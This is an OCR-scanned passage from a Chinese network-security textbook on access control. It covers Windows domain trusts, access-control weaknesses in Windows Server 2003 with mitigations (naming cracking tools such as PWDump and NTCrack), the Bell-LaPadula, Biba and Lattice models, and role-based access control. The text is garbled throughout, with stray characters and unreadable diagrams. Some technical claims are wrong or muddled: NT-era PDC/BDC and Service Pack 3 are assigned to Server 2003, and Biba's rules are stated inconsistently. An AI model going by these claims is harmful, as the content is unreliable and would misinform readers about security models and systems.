型 或 复杂 系统 提供 了 更 为 灵活 和 简便 的 管理 方法 。 

域 指 的 是 一 组 共享 数据 库 并 具有 共同 安全 策略 的 计算 机 ( 即 任意 一 组 Windows Server 


2003 服务 器 和 工作 站 ) 。 在 一 个 域 中 至 少 有 一 个 服务 器 设计 为 主 域 控制 器 ( 称 为 PDC) ,可 
以 (在 大 多 数 情况 下 应 该 ) 带 有 一 个 或 多 个 备份 域 控制 器 ( 称 为 BDC) ,在 PDC 中 维护 着 一 
个 域内 适用 于 所 有 服务 器 的 中 心 账号 数据 库 。 用 户 账 号 数据 库 只 能 在 PDC 中 更 改 , 然 后 再 
自动 送 到 BDC 中 ,在 BDC 中 保留 着 用 户 账号 数据 库 的 只 读 备 份 。 如 果 PDC 出 现 了 重大 错 
误 而 不 能 运行 ,就 可 以 把 BDC 变 成 PDC ,使 得 网 络 继续 正常 工作 。 

在 有 两 个 或 多 个 域 组 成 的 网 络 中 ,每 个 域 都 作为 带 有 其 自 域 A_ 要 托 , 域 B 
身 账 号 数据 库 的 一 个 独立 网 络 来 工作 。 默 认 时 域 之 间 是 不 能 相 (委托 域 ) 〈 受 托 域 ) 
互通 信 的 ,如 果 某 个 域 的 一 些 用 户 需 要 访问 另 一 个 域 中 的 资源 ， 13.7 域 之 间 的 委托 关系 
就 需要 建立 域 之 间 的 委托 关系 。 委 托 关系 打开 了 域 之 间 的 通信 
渠道 ,如 图 13.7 所 示 。 

受托 域 B 中 的 用 户 就 可 以 访问 委托 域 A 中 的 资源 。 

委托 关系 可 以 是 双向 的 , 即 域 A 委托 域 B, 域 B 委托 域 A, 这 样 域 B 中 的 用 户 就 可 以 访 
问 域 A 中 的 资源 , 域 A 中 的 用 户 也 可 以 访问 域 B 的 资源 。 

6. Windows Server 2003 的 访问 控制 漏洞 

Windows Server 2003 使 用 广泛 ,Internet 上 采用 Windows Server 2003 平台 作为 服务 
器 的 站 点 也 越 来 越 多 。 但 Windows Server 2003 系统 仍然 存在 着 一 些 重大 的 访问 控制 漏 
洞 。 某 些 安全 漏洞 是 很 严重 的 ,在 最 坏 的 情况 下 ,一 个 黑客 可 以 利用 这 些 漏洞 来 破译 一 个 或 
多 个 Domain Administrator 账户 的 口令 ,并且 对 NT 域 中 所 有 主机 进行 破坏 活动 。 

服务 器 和 工作 站 的 访问 控制 漏洞 主要 包括 以 下 几 种 : 

(1) 安全 账户 管理 (SAM) 数 据 库 可 以 由 Administrator 账户 .Administrator 组 中 的 所 
有 成 员 、 备 份 操作 员 、 服 务 器 操作 员 和 所 有 具有 备份 特权 的 人 员 复 制 。 

SAM 数据 库 的 一 个 备份 能 够 被 某 些 工具 所 利用 来 破解 口令 。Windows Server 2003 在 
对 用 户 进 行 身 份 验证 时 ,只 能 达到 加 密 RSA 的 水 平 。 在 这 种 情况 下 ,甚至 没有 必要 使 用 攻 
击 来 猜测 那些 明文 口令 。 能 破解 SAM 数据 库 并 能 破解 口令 的 工具 有 PWDump 和 
NTCrack。 实 际 上 ,PWDump 的 作者 还 有 另 一 个 软件 包 PWAudit, 它 可 以 跟踪 由 PWDump 
获取 到 的 任何 东西 的 内 容 。 

为 了 减 小 风险 ,应 该 严格 限制 Administrator 组 和 备份 账户 的 成 员 资格 。 加 强 对 这 些 账 
户 的 跟踪 ,尤其 是 Administrator 账户 的 登录 (Log on) 失 败 和 注销 (Log off) 失 败 。 对 SAM 
进行 的 任何 权限 改变 和 对 其 本 身 的 修改 进行 审计 ,并 且 设 置 发 送 一 个 警告 给 
Administrator, 告 知 有 事件 发 生 。 切 鼠 要 改变 默认 权限 设置 来 预防 这 个 漏洞 。 改 变 
Administrator 账户 的 名 字 ,显然 可 以 防止 黑客 对 默认 命名 的 账户 进行 攻击 。 这 个 措施 可 以 
解决 一 系列 的 安全 漏洞 。 为 系统 管理 员 和 备份 操作 员 创建 特殊 账户 。 系 统管 理 员 在 进行 特 
殊 任务 时 必须 用 这 个 特殊 账户 注册 ,然后 注销 。 所 有 具有 Administrator 和 备份 特权 的 账户 
绝对 不 能 浏览 Web。 所 有 的 账户 只 能 具有 User 或 者 Power User 组 的 权限 。 采 用 口令 过 
滤器 来 检测 和 减少 易 猜 测 的 口令 ,例如 ,PASSPROP(Windows NT Resource Kit 提供 )、 
ScanNT( 一 个 商业 口令 检测 工具 软件 包 )。 使 用 加 强 的 口令 不 易 被 猜测 。Service Pack 3 可 
以 加 强 Windows Server 2003 口令 ,一 个 加 强 的 口令 必须 包含 大 小 写字 母 . 数 字 和 特殊 字 
符 。 使 用 二 级 身份 验证 机 制 , 比 如 令 牌 卡 (Token Card) ,可 提供 更 强壮 的 安全 解决 方案 ,但 
它 比 较 昂 贵 。 
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(2) 木马 和 病毒 可 能 依靠 默认 权力 做 SAM 的 备份 ,获取 访问 SAM 中 的 口令 信息 ,或 
者 通过 访问 紧急 修复 盘 ERD 的 更 新 盘 。 

木马 和 病毒 ,可 以 由 以 下 各 组 中 的 任何 成 员 在 用 默认 权限 做 备份 时 执行 (在 默认 情况 
下 ,它们 包括 Administrator 管理 员 、Administrator 组 成 员 、 备 份 操作 员 、 服 务 器 操作 员 、 具 
有 备份 特权 的 任何 人 ) ,或 者 在 访问 ERD 更 新 盘 时 执行 (在 默认 情况 下 ,包括 任何 人 )。 例 
如 ,如 果 一 个 用 户 是 Administrator 组 的 成 员 , 当 他 在 系统 上 工作 时 ,木马 可 能 做 出 任何 
事情 。 

为 了 减 小 风险 ,应 该 使 得 所 有 具有 Administrator 和 备份 特权 的 账户 绝对 不 能 浏览 
Web。 所 有 的 账户 只 能 具有 User 或 者 Power User 组 的 权限 。 

(3) 能 够 物理 上 访问 Windows Server 2003 机 器 的 任何 人 ,可 能 利用 某 些 工具 程序 来 获 
得 Administrator 级 别 的 访问 权 。Internet 上 有 些 工 具 程 序 可 以 相对 容易 地 获得 
Administrator 特权 ,比如 NTRecover、Winternel Software 的 NTLocksmith。 

(4) Windows Server 2003 的 客户 可 以 保存 口令 于 文件 中 ,以 便 快速 缓冲 。 

任何 人 可 能 通过 访问 内 存 来 获取 加 密 的 口令 ,或 者 通过 访问 Windows Server 2003 工 
作 站 的 ADMINST. PWD 文件 来 读 取 口 令 , 以 获得 默认 管理 员 的 访问 权 。 为 了 减 小 风险 应 
当 严 格 限 制 域 中 客户 的 使 用 。 限 制 Windows Server 2003 工作 站 上 的 管理 员 特 权 。 

(5) Windows Server 2003 域 中 默认 的 Guest 用 户 。 

如 果 Guest 账户 是 开放 的 , 当 用 户 登 录 失 败 的 次 数 达到 设置 时 ,他 可 以 获得 Windows 
Server 2003 工作 站 的 Guest 访问 权 , 从 而 进入 域 。 

(6) 如 果 系 统 里 只 有 一 个 Administrator 账户 , 当 注册 失败 的 次 数 达 到 设置 时 ,该 账户 
也 不 可 能 被 锁 住 。 

系统 里 只 有 一 个 Administrator 账户 的 情况 是 Windows Server 2003 的 一 个 预先 考虑 
过 的 特征 ,然而 , 它 也 成 为 一 种 风险 。 这 种 情况 适用 于 Windows Server 2003 域 和 Windows 
Server 2003 工作 站 。 为 了 减 小 风险 ,除了 系统 默认 创建 的 Administrator 账户 ,还 应 该 创建 
至 少 一 个 具有 管理 员 特 权 的 账户 ,并 且 把 默认 的 Administrator 账户 改 成 另外 一 个 名 字 。 

(7) Windows Server 2003 上 的 默认 Registry 权限 设置 有 很 多 不 当 之 处 。 

Registry 的 默认 权限 设 先是 对 “所 有 人 ”“ 完 全 控制 "(Full Control) 和 ”创建 "Create)， 
这 种 设置 可 能 引起 Registry 文件 的 删除 或 者 替换 。 

为 了 减 小 风险 ,对 于 Registry, 严 格 限 制 只 可 进行 本 地 注册 ,不 可 远程 访问 。 在 NT 工 
作 站 上 ,限制 对 Registry 编辑 工具 的 访问 。 使 用 第 三 方 工具 软件 , 比如 Enterprise 
Administrator(Mission Critical Software) 、 锁 住 Registry。 或 者 ,至 少 应 该 实现 的 是 ,把 “所 
有 人 ”默认 的 “完全 控制 ?权力 改 成 只 能 “创建 "。 实 际 上 ,如 果 把 这 种 权力 设置 成 “只 读 ”, 将 
会 给 系统 带 来 许多 潜在 的 功能 性 问题 ,因此 在 实现 之 前 ,一 定 要 小 心 谨慎 地 进行 测试 。 
Windows NT 4.0 引入 了 一 个 Registry Key 用 来 关闭 非 管理 员 的 远程 Registry 访问 。 在 
Windows Server 2003 服务 器 上 ,这 是 一 个 默认 的 Registry Key, 对 于 Windows Server 2003 
工作 站 ,必须 把 这 个 Registry Key 添加 到 Registry 数据 库 中 。 

(8) 通过 访问 其 他 的 并 存 操作 系统 ,有 可 能 绕 过 NTFS 的 安全 设置 。 

已 经 有 很 多 工具 ,用 来 访问 基于 Intel 系统 上 的 NTFS 格式 的 硬盘 驱动 器 ,而 不 需要 任 
何 授权 ,就 允许 操纵 Windows Server 2003 的 各 种 安全 配置 。 这 些 工具 有 DOS/Windows 


的 NTFS 文件 系统 重 定向 器 (NTFS File System Redirector for DOSVWindows)、SAMBA 
和 Linux NTFS Reader。 这 种 情况 只 有 一 种 可 能 ,就 是 物理 上 能 访问 机 器 。 

为 了 减 小 风险 应 当 使 用 专门 的 分 区 。 限 制 Administrator 组 和 备份 操作 员 组 。 制 定 规 
章 制度 限制 管理 员 的 操作 程序 ,禁止 这 样 的 访问 ,或 者 明确 授权 给 指定 的 几 个 系统 管理 员 。 
可 以 考虑 采用 第 三 方 预 引导 身份 验证 机 制 。 


13.3 强制 访问 控制 


13.3.1 强制 访问 控制 概述 


强制 访问 控制 (Mandatory Access Control,MAC) 是 一 种 不 允许 主体 干涉 的 访问 控制 
类 型 。 它 是 基于 安全 标识 和 信息 分 级 等 信息 敏感 性 的 访问 控制 ,通过 比较 资源 的 敏感 性 与 
主体 的 级 别 来 确定 是 否 允许 访问 。 系 统 将 所 有 主体 和 客体 分 成 不 同 的 安全 等 级 ,给 予 客体 
的 安全 等 级 能 反映 出 客体 本 身 的 敏感 程度 ; 主体 的 安全 等 级 标志 着 用 户 不 会 将 信息 透露 给 
未 经 授权 的 用 户 。 通 常安 全 等 级 可 分 为 4 个 级 别 : 绝密 级 (Top Secret) 、 秘 密级 (Secret) 、 
机 密级 (Confidential) 和 无 密级 (Unclassified) 。 这 些 安全 级 别 可 以 支配 同一 级 别 或 低 一 级 
别 的 对 象 。 当 一 个 主体 访问 一 个 客体 时 必须 符合 各 自 的 安全 级 别 需求 ,特别 是 如 下 两 个 原 
则 必须 遵守 。 

。 Read Down: 主体 安全 级 别 必须 高 于 被 读 取 对 象 的 级 别 。 

。 Write up: 主体 安全 级 别 必须 低 于 被 写 人 对象 的 级 别 。 

这 些 规则 可 以 防止 高 级 别 对 象 的 信息 转播 到 低级 别 的 对 象 中 ,这 样 系统 中 的 信息 只 能 
在 同一 层次 传送 或 流向 更 高 一 级 ,如 图 13. 8 所 示 。 


主体 密级 


RW W W WwW TS 
目 绝密 TS | Top Secret 
R RW W VW 目 S | 数 
R R RW W 目 C | 据 秘密 S | Secret 
R RR R Rw 四 U | 和 | 机 cc | Confidential 
客体 TS Ss C U 无 密级 U | Unclassified 


13.8 强制 访问 控制 中 的 数据 流 


强制 访问 控制 对 专用 的 或 简单 的 系统 是 有 效 的 ,但 对 通用 系统 和 大 型 系统 并 不 那么 
有 效 。 

一 般 强 制 访问 控制 采用 以 下 几 种 方法 。 

1. 过 程控 制 

在 通常 的 计算 机 系统 中 ,只 要 系统 允许 用 户 自己 编程 ,一 般 就 很 难 杜绝 木马 。 但 可 以 对 其 
过 程 采 取 某 些 措施 ,这 种 方法 就 称 为 过 程控 制 。 例 如 ,警告 用 户 不 要 运行 系统 目录 以 外 的 任何 
程序 。 用 户 如 果 偶然 调用 一 个 其 他 目录 的 文件 时 ,要 求 其 不 要 做 任何 动作 等 。 需 要 说 明 的 一 
点 是 ,这 些 限 制 取决 于 用 户 本 身 执行 与 否 。 因 而 ,自愿 的 限制 很 容易 变 成 实际 上 没有 限制 。 

2. 限制 访问 控制 

由 于 自主 控制 方式 允许 用 户 程序 来 修改 他 拥有 文件 的 访问 控制 表 , 因 此 为 非法 者 带 来 


访问 挫 制 与 VPN 鞭 术 


基于 案例 的 网 络 安 会 技术 与 实践 


可 乘 之 机 。 系 统 可 以 不 提供 这 一 方便 ,在 这 类 系统 中 ,用 户 要 修改 访问 控制 表 的 唯一 途径 是 
请 求 一 个 特权 系统 调用 。 该 调用 的 功能 是 依据 用 户 终端 输入 的 信息 ,而 不 是 靠 另 一 个 程序 
提供 的 信息 来 修改 访问 控制 信息 。 

3. 系统 限制 

显然 ,实施 的 限制 最 好 是 由 系统 自动 完成 。 要 对 系统 的 功能 实施 一 些 限制 ,比如 限制 共 
享 文件 ,但 共享 文件 是 计算 机 系统 的 优点 ,所 以 是 不 可 能 加 以 完全 限制 的 。 再 者 ,就 是 限制 
用 户 编程 。 事 实 上 ,有 许多 不 需 编程 的 系统 都 是 这 样 做 的 。 不 过 这 种 做 法 只 适用 于 某 些 专 
用 系统 。 在 大 型 的 .通用 系统 中 ,编程 能 力 是 不 可 能 去 除 的 。 在 网 络 中 同样 也 是 不 行 的 ,在 
网 络 中 一 个 没有 编程 能 力 的 系统 可 能 会 接收 另 一 个 具有 编程 能 力 的 系统 发 出 的 程序 。 有 编 
程 能 力 的 网 络 系统 可 以 对 进入 系统 的 所 有 路 径 进行 分 析 , 并 采取 一 定 的 措施 ,这 样 就 可 以 增 
加 木马 攻击 的 难度 。 


13.3.2 强制 访问 控制 的 模型 


强制 访问 控制 的 安全 性 比 自主 访问 控制 的 安全 性 有 了 提高 ,但 灵活 性 要 差 一 些 。 强 制 
访问 控制 包括 规则 型 (Rule-based) 访 问 控 制 和 管理 指定 型 (Administratively-based) 访 问 
控制 。 

MAC 模型 中 有 几 种 比较 主要 的 模型 : Lattice 模型 .Bell-LaPadula 模型 (BLP model) 和 
Biba 模型 (Biba model) 。 下 面 分 别 进行 介绍 。 

1，Bell-LaPadula 模型 

BLP 模型 的 出 发 点 是 维护 系统 的 保密 性 .有 效 地 防止 信息 泄露 ,这 与 下 面 将 要 介绍 的 
维护 信息 系统 数据 完整 性 的 Biba 模型 正好 相反 。Lattice 模型 没有 考虑 木马 等 不 安全 因素 
的 潜在 威胁 ,低级 安全 用 户 有 可 能 复制 和 拷贝 比较 敏感 的 信息 。 木 马 的 最 大 作用 是 降低 整 
个 系统 的 安全 级 别 ,考虑 到 这 种 攻击 行为 ,Bell 和 LaPadula 设计 了 一 种 模型 抵抗 这 种 攻击 ， 
称 为 Bell-LaPadula 模型 。Bell-LaPadula 模型 可 以 有 效 防止 低级 用 户 和 进程 访问 安全 级 别 
比 他 们 高 的 信息 资源 。 此 外 ,安全 级 别 高 的 用 户 和 进程 也 不 能 向 比 他 安全 级 别 低 的 用 户 和 
进程 写 人 数据 。 这 就 是 Bell-LaPadula 模型 建立 的 访问 控制 原则 ,可 用 “只 能 从 下 读 、 向 上 
写 ? 来 表示 。 

BLP 模型 的 安全 策略 包括 强制 访问 控制 和 自主 访问 控制 两 部 分 。 

(1) 强制 访问 控制 中 的 安全 特性 要 求 对 给 定安 全 级 别 的 主体 , 仅 被 允许 对 同一 安全 级 
别 和 较 低 安全 级 别 上 的 客体 进行 读 操作 ; 对 给 定安 全 级 别 上 的 主体 , 仅 被 允许 向 相同 安全 
级 别 或 较 高 安全 级 别 上 的 客体 进行 写 操作 。 

(2) 自由 访问 控制 允许 用 户 自 行 定义 是 否 让 个 人 或 组 织 存 取 数 据 。 

BLP 模型 为 通用 的 计算 机 系统 定义 了 安全 性 属性 , 即 以 一 组 规则 表示 什么 是 一 个 安全 
的 系统 ,尽管 这 种 基于 规则 的 模型 比较 容易 实现 .但 是 它 不 能 以 语义 的 形式 阐明 安全 性 的 含 
义 ,因此 这 种 模型 不 能 解释 主 -客体 框架 以 外 的 安全 性 问题 。 例 如 ,在 一 种 远程 读 的 情况 下 ， 
一 个 高 安全 级 主体 向 一 个 低 安全 级 客体 发 出 远程 读 请 求 ,这 种 分 布 式 读 请求 可 以 被 看 做 是 
从 高 安全 级 向 低 安全 级 的 一 个 消息 传递 .也 就 是 “向 下 写 ”。 另 一 个 例子 是 可 信 主 体 的 概念 ， 
可 信和 主体 可 以 是 管理 员 或 是 提供 关键 服务 的 进程 , 像 设 备 驱动 程序 和 存储 管理 功能 模块 ,这 
些 可 信和 主体 车 不 违背 BLP 模型 的 规则 就 不 能 正常 执行 它们 的 任务 ,而 BLP 模型 对 这 些 可 


由 


言 主体 可 能 引起 的 秘密 泄露 没有 任何 处 理 和 避免 的 方法 。 

2. Biba 模型 

Biba 模型 是 在 研究 BLP 模型 的 特性 时 发 现 的 ,BLP 模型 只 解决 了 信息 的 保密 问题 ,其 
在 完整 性 定义 方面 存在 着 一 定 缺陷 。BLP 模型 没有 采取 有 效 的 措施 来 制约 对 信息 的 非 授 
权 修 改 , 因 此 使 非法 、 越 权 自 改 成 为 可 能 。 考 虑 到 上 述 因素 ,Biba 模型 模仿 BLP 模型 的 信息 
保密 性 级 别 , 定 义 了 信息 完整 性 级 别 , 在 信息 流向 的 定义 方面 不 允许 从 级 别 低 的 进程 到 级 别 
高 的 进程 ,也 就 是 说 ,用 户 只 能 向 比 自己 安全 级 别 低 的 客体 写 入 信息 ,从 而 防止 非法 用 户 创 
建安 全 级 别 高 的 客体 信息 ,从 而 避免 越权 、 自 改 等 行为 的 产生 。Biba 模型 可 同时 针对 有 层 
次 的 安全 级 别 和 无 层次 的 安全 种 类 。Biba 模型 的 主要 特征 是 禁止 向 上 读 。 这 个 特征 使 得 
完整 性 级 别 高 的 文件 一 定 是 由 完整 性 高 的 进程 所 产生 的 ,从 而 保证 了 完整 性 级 别 高 的 文件 
不 会 被 完整 性 低 的 进程 中 的 信息 所 覆盖 。 

3，Lattice 模型 

在 Lattices 模型 中 ,每 个 资源 和 用 户 都 服从 于 一 个 安全 类 别 ,这 些 安全 类 别 被 称 之 为 安 
全 级 别 , 也 就 是 在 本 章 开始 所 描述 的 几 个 安全 级 别 TS、SC、R 和 U。 在 整个 安全 模型 中 , 信 
息 资源 对 应 一 个 安全 类 别 ,用 户 所 对 应 的 安全 级 别 必须 比 可 以 使 用 的 客体 资源 高 才能 进行 
访问 。Lattices 模型 是 实现 安全 分 级 的 系统 ,这 种 方案 非常 适用 于 需要 对 信息 资源 进行 明 
显 分 类 的 系统 。 

MAC 访问 控制 模型 和 DAC 访问 控制 模型 属于 传统 的 访问 控制 模型 ,对 这 两 种 模型 的 
研究 也 比较 充分 。 在 实现 上 ,MAC 和 DAC 通常 为 每 个 用 户 赋予 对 客体 的 访问 权限 规则 
集 ,考虑 到 管理 的 方便 ,在 这 一 过 程 中 还 经 常 将 具有 相同 职能 的 用 户 聚 为 组 ,然后 青 为 每 个 
组 分 配 许 可 权 。 用 户 自主 地 把 自己 所 拥有 的 客体 的 访问 权限 授予 其 他 用 户 , 这 种 做 法 的 优 
点 是 显而易见 的 ,但 是 如 果 机 构 的 组 织 结构 或 是 系统 的 安全 需求 处 于 不 断 变化 的 过 程 中 时 ， 
就 需要 进行 大 量 烦 琐 的 授权 变动 ,系统 管理 员 的 工作 将 变 得 非常 繁重 ,更 主要 的 是 容易 发 生 
错误 ,造成 一 些 意 想不到 的 安全 漏洞 。 考 虑 到 上 述 因 素 , 可 以 引入 新 的 机 制 加 以 解决 。 


13.3.3 强制 访问 控制 实例 


强制 访问 控制 的 安全 性 比 自主 访问 控制 的 安全 性 有 所 提高 ,但 灵活 性 要 差 一 些 。 强 制 
访问 控制 MAC 通常 用 于 多 级 安全 军事 系统 。 对 专用 的 或 简单 的 系统 强制 访问 控制 是 有 效 
的 ,但 对 通用 的 大 型 系统 并 不 那么 有 效 。 

强制 访问 控制 一 般 与 自主 访问 控制 结合 使 用 ,并 且 实 施 一 些 附加 的 、 更 强 的 访问 限制 。 
一 个 主体 只 有 通过 了 自主 与 强制 性 访问 限制 检查 后 ,才能 访问 某 个 客体 。 用 户 可 以 利用 自 
主 访问 控制 来 防范 其 他 用 户 对 自己 客体 的 攻击 ,由 于 用 户 不 能 直接 改变 强制 访问 控制 属性 ， 
因此 强制 访问 控制 提供 了 一 个 不 可 逾越 的 、 更 强 的 安全 保护 层 , 以 防止 其 他 用 户 偶然 或 故意 
地 滥用 自主 访问 控制 。 

强制 访问 策略 将 每 个 用 户 及 文件 赋予 一 个 访问 级 别 , 如 绝密 级 (Top Secret) 、 秘 密级 
(Secret) ,机 密级 (Confidential) 和 无 密级 (Unclassified) 。 其 级 别 为 TS 之 CU, 系 统 根据 
主体 和 客体 的 敏感 标记 来 决定 访问 模式 。 

强制 访问 控制 Bell-LaPadula 安全 模型 应 用 于 军事 系统 的 实例 如 图 13. 9 所 示 ,图 中 显 
示 了 强制 访问 控制 系统 不 允许 低 信任 级 别 的 用 户 读 高 敏感 度 的 信息 ,也 不 允许 高 敏感 度 的 
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信息 写 入 低 敏感 度 区 域 ,禁止 信息 从 高 级 别 流向 低级 别 。 强 制 访问 控制 通过 这 种 梯度 安全 
标签 实现 信息 的 单 向 流通 。 


主体 客体 主体 客体 
Top Secret Top Secret Top Secret | 


Top Secret 禁止 读 


Secret Secret 


Secret Secret | 


Unclassified Unclassified Unclassified | 禁止 Unclassified | 


13.9 ”Bell-LaPadula MAC 模型 应 用 于 军事 系统 实例 


强制 访问 控制 Biba 安全 模型 的 实例 如 图 13. 10 所 示 , 图 中 显示 了 强制 访问 控制 的 原则 
是 利用 “不 下 读 / 不 上 写 ” 来 保证 数据 的 完整 性 。 在 实际 应 用 中 ,完整 性 保护 主要 是 为 了 避免 
应 用 程序 修改 某 些 重要 的 系统 程序 或 系统 数据 库 。 


主体 客体 主体 客体 

High High | High _ High 
intergrity intergrity intergrity | 禁止 写 intergrity 
Medium | Medium Medium 了 | Medium 
intergrity intergrity intergrity intergrity 

Low 禁 | 贞 Low Low 允许 写 Low 
intergrity intergrity intergrity intergrity 


13.10 Biba 强制 访问 控制 模型 应 用 实例 


从 以 上 的 两 个 实例 可 以 看 出 ,一 般 强制 访问 控制 采用 限制 访问 控制 ,过程 控制 、 系 统 限 
制 3 种 方法 。 

1. 限制 访问 控制 

一 个 木马 可 以 攻破 任何 形式 的 自主 访问 控制 .由 于 自主 控制 方式 运行 用 户 程序 来 修改 
所 拥有 文件 的 访问 控制 表 , 因 此 为 非法 者 带 来 了 可 乘 之 机 。MAC 可 以 不 提供 这 一 方便 ,在 
这 类 系统 中 ,用 户 要 修改 访问 控制 表 的 唯一 途径 是 请 求 一 个 特权 系统 调用 。 该 调用 的 功能 
是 依据 用 户 终 端 输 入 的 信息 ,而 不 是 靠 另 一 个 程序 提供 的 信息 来 修改 访问 控制 信息 。 

2. 过 程控 制 

在 通常 的 计算 机 系统 中 ,只 有 系统 允许 用 户 自己 编程 ,就 没 办 法 杜绝 木马 。 但 可 以 对 其 
过 程 采取 某 些 措 施 ,这 种 方法 称 为 过 程控 制 。 例 如 ,警告 用 户 不 用 运行 系统 目录 以 外 的 任何 
程序 。 提 醒 用 户 注 意 , 如 果 偶 然 调用 一 个 其 他 目录 的 文件 时 ,不 要 做 任何 动作 ,等 待 。 需 要 
说 明 的 一 点 是 ,这 些 限 制 取决 于 用 户 本 身 执 行 与 否 。 

3. 系统 限制 

要 对 系统 的 功能 实施 一 些 限制 。 比 如 ,限制 共享 文件 ,但 共享 文件 是 计算 机 系统 的 优 
点 ,所 以 是 不 可 能 加 以 完全 限制 的 。 再 者 ,就 是 限制 用 户 编程 。 不 过 这 种 做 法 只 适用 于 某 些 
专用 系统 。 在 大 型 的 通用 系统 中 ,编程 能 力 是 不 可 能 去 除 的 。 


13.4 基于 角色 的 访问 控制 


角色 (role) 是 指 一 个 可 以 完成 一 定 事务 的 命名 组 ,不 同 的 角色 通过 不 同 的 事务 来 执行 
各 自 的 功能 ,事务 (transaction) 是 指 一 个 完成 一 定 功能 的 过 程 ,可 以 是 一 个 程序 或 程序 的 一 
部 分 。 角 色 是 代表 具有 某 种 能 力 的 人 或 是 某 些 属性 的 人 的 一 类 抽象 。 


13.4.1 基于 角色 的 访问 控制 概述 


基于 角色 的 访问 控制 RBAC(Role-based Access Control) 是 由 美国 国家 标准 化 和 技术 
委员 会 (NIST) 的 Ferraiolo 等 人 在 20 世纪 90 年 代 提 出 的 ,其 特有 的 优点 引起 了 学 术 界 和 
工业 界 的 广泛 关注 ,成 为 研究 计算 机 和 数据 库 安全 性 的 一 个 热点 。 此 后 NIST 专门 成 立 了 
RBAC 研究 机 构 , 对 基于 角色 的 访问 控制 进行 了 系统 的 研究 。 

RBAC 的 基本 思想 是 在 用 户 和 访问 权限 之 间 引 入 角色 的 概念 ,将 用 户 和 角色 联系 起 来 ， 
通过 对 角色 的 授权 来 控制 用 户 对 系统 资源 的 访问 ,如 图 13. 11 所 示 。 这 是 因为 在 很 多 实际 
应 用 中 ,用户 并 不 是 可 以 访问 的 客体 信息 资源 的 所 有 者 ,这 样 的 话 , 访 问 控制 应 该 基于 用 户 
的 职务 而 不 是 基于 用 户 在 哪个 组 或 是 谁 是 信息 的 所 有 者 , 即 访问 控制 是 由 各 个 用 户 在 部 门 
中 所 担任 的 角色 来 确定 的 。 例 如 ,一 个 学 校 可 以 有 教工 ,老师 .学 生 和 其 他 管理 人 员 等 角色 。 
RBAC 从 控制 主体 的 角度 出 发 ,根据 管理 中 相对 稳定 的 职权 和 责任 来 划分 角色 ,将 访问 权限 
与 角色 相 联系 ,这 点 与 传统 的 MAC 和 DAC 将 权限 直接 授予 用 户 的 方式 不 同 ; 通过 给 用 户 
分 配合 适 的 角色 ,让 用 户 与 访问 权限 相 联 系 。 角 色 成 为 访问 控制 中 访问 主体 和 受 控 对 象 之 


间 的 一 座 桥梁 。 
CFRP > 用 户 分 配 Ce > 权限 分 配 CR 7) 


13.11 RBAC 的 基本 思想 


相 比较 而 言 ,RBAC 是 实施 面向 机 构 的 安全 策略 的 一 种 有 效 的 访问 控制 方式 ,其 具有 灵 
活性 方便 性 和 安全 性 的 特点 。 目 前 在 大 型 数据 库 系统 的 权限 管理 中 得 到 普遍 应 用 ,角色 由 
系统 管理 员 定 义 ,角色 成 员 的 增 减 也 只 能 申 系统 管理 员 来 执行 , 即 只 有 系统 管理 员 有 权 定义 
和 分 配角 色 。 用 户 与 客体 无 直接 联系 ,他 只 有 通过 角色 才 享 有 该 角色 所 对 应 的 权限 ,从 而 访 
问 相应 的 客体 。 

美国 国家 标准 技术 研究 所 对 28 个 组 织 进行 的 调查 结果 表明 RBAC 的 功能 相当 强大 ， 
适用 于 许多 类 型 用 户 的 需求 ,从 政府 机 关 到 商业 应 用 。 特 别 是 ,RBAC 模型 非常 适用 于 数据 
库 应 用 层 的 安全 模型 ,因为 在 应 用 层 内 ,角色 的 逻辑 意义 更 加 明显 和 直接 。RBAC 不 是 直接 
授权 给 用 户 ,而 是 先 授权 给 角色 ,然后 再 授予 用 户 角色 ,这 样 在 用 户 和 权限 之 间 引 入 角色 ,从 
而 大 大 降低 了 系统 的 复杂 度 , 同 时 RBAC 体现 了 系统 的 组 织 结构 ,简洁 并 具有 灵活 性 ,大 大 
降低 了 系统 管理 员 误 操作 的 可 能 性 。 角 色 之 间 的 互 斥 关系 可 以 很 容易 地 实现 任务 分 离 , 角 
色 访 问 控制 还 支持 最 小 权限 。 
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13.4.2 基于 角色 的 访问 控制 中 的 角色 管理 


角色 可 以 看 做 是 一 组 操作 的 集合 ,不 同 的 角色 具有 不 同 的 操作 集 ,这 些 操作 集 由 系统 管 
理 员 分 配给 角色 。 依 据 角色 的 不 同 , 每 个 主体 只 能 执行 自己 所 制定 的 访问 功能 。 

系统 定义 了 各 种 角色 ,每 种 角色 可 以 完成 一 定 的 职能 ,不 同 的 用 户 根据 其 职能 和 责任 被 
赋予 相应 的 角色 ,一 旦 某 个 用 户 成 为 某 角 色 的 成 员 , 则 此 用 户 可 以 完成 该 角色 所 具有 的 
职能 。 

1. 系统 管理 员 的 职责 

系统 管理 员 负 责 授 予 用 户 各 种 角色 的 成 员 资 格 或 撤销 某 用 户 具 有 的 某 个 角色 ,例如 机 
构 中 新 进 一 名 成 员 ,那么 系统 管理 员 只 需 将 新 成 员 添 加 到 原 有 角色 的 成 员 中 即 可 ,而 无 须 对 
访问 控制 列表 做 改动 。 同 一 个 用 户 可 以 是 多 个 角色 的 成 员 , 即 同一 个 用 户 可 以 扮演 多 种 角 
色 。 同 样 ,一 个 角色 可 以 拥有 多 个 用 户 成 员 , 这 与 现实 是 一 致 的 ,一 个 人 可 以 在 同一 部 门 中 
担任 多 种 职务 ,而 且 担 任 相同 职务 的 可 能 不 止 一 人 。 因 此 RBAC 提供 了 一 种 描述 用 户 和 权 
限 之 间 的 多 对 多 关系 ,角色 可 以 划分 成 不 同 的 等 级 ,通过 角色 等 级 关系 来 反映 一 个 组 织 的 职 
权 和 责任 关系 ,这 种 关系 具有 反 身 性 、 传 递 性 和 非 对 称 性 特点 ,通过 继承 形成 了 一 个 偏 序 关 
系 。RBAC 中 通常 定义 不 同 的 约束 规则 来 对 模型 中 的 各 种 关系 进行 限制 ,最 基本 的 约束 是 
相互 排斥 约束 和 基本 限制 约束 ,分 别 规定 了 模型 中 的 互 斥 角色 和 一 个 角色 可 被 分 配 的 最 大 
用 户 数 。RBAC 中 引进 了 角色 的 概念 ,用 角色 表示 访问 主体 具有 的 职权 和 责任 ,灵活 地 表达 
和 实现 了 企业 的 安全 策略 ,使 系统 权限 管理 在 企业 的 组 织 视图 这 个 较 高 的 抽象 集 上 进行 ,从 
而 简化 了 权限 设置 的 管理 。 从 这 个 角度 看 , RBAC 很 好 地 解决 了 机 构 管理 信息 系统 中 用 户 
数量 多 、 变 动 频 繁 的 问题 。 

2. 角色 的 定义 

